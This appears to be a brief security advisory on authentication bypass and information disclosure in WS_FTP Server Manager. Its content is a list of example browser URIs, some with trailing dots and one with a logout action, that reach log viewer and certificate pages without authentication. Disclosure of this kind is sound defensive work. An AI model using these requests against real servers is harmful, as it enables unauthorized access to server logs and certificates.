WS_FTP Server Manager Authentication Bypass and Information Disclosure Vulnerabilities

WS_FTP Server Manager Authentication Bypass and Information Disclosure Vulnerabilities

To exploit this issue, attackers can use a browser.

The following example URIs are available:

http://www.example.com/WSFTPSVR/FTPLogServer/login.asp?action=logLogout
http://www.example.com/WSFTPSVR/FTPLogServer/LogViewer.asp
http://www.example.com/WSFTPSVR/login.asp.
http://www.example.com/WSFTPSVR/FTPLogServer/LogViewer.asp.
http://www.example.com/WSFTPSVR/FTP/ViewCert.asp.